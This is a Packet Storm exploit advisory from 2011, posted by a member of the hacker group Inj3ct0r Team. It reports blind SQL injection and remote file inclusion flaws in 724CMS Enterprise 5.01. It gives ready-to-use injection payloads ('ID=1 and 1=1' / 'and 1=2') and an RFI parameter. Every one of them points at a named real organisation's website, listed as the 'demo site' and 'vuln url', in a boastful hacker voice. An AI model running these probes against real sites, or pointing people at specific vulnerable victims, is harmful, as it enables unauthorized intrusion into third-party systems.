724CMS Enterprise 5.01 Remote File Inclusion / SQL Injection

2011-08-31T00:00:00
ID PACKETSTORM:104626
Type packetstorm
Reporter OuTLaWz
Modified 2011-08-31T00:00:00

Description

                                        
                                            `#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
#0 _ __ __ __ 1  
#1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
#0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
#1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
#0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
#1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
#0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
#1 \ \____/ >> Exploit database separated by exploit 0  
#0 \/___/ type (local, remote, DoS, etc.) 1  
#1 1  
#0 [+] Site : 1337day.com 0  
#1 [+] Support e-mail : submit[at]1337day.com 1  
#0 0  
#1 ######################################## 1  
#0 I'm OuTLaWz member from Inj3ct0r Team 1  
#1 ######################################## 0  
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
# spl0itz title: 724CMS Eneterprise (index.php) (section.php) (RFI/Blind SQL Injection) Multiple Vulnerabilities  
  
# date: 31/08/2011  
  
# author: OuTLaWz aka The_Exploited  
  
# vendor: http://www.724cms.com/  
  
# version: 5.01  
  
# category:: webapps  
  
# google dork: no dork bro, is for the lamer ;)  
  
# tested on: windows seven 32bit  
  
# demo site: http://www.inuitcircumpolar.com/  
  
# vuln url: http://www.inuitcircumpolar.com/section.php?ID=6  
  
# blind sqli: http://www.inuitcircumpolar.com/index.php?ID=1 and 1=1 //\\ http://www.inuitcircumpolar.com/index.php?ID=1 and 1=2   
  
# blind sqli: http://www.inuitcircumpolar.com/section.php?ID=6 and 1=1 //\\ http://www.inuitcircumpolar.com/section.php?ID=6 and 1=2  
  
# rfi: http://www.inuitcircumpolar.com/section.php?ID=[RFI]  
  
// 2Pac R.I.P.  
`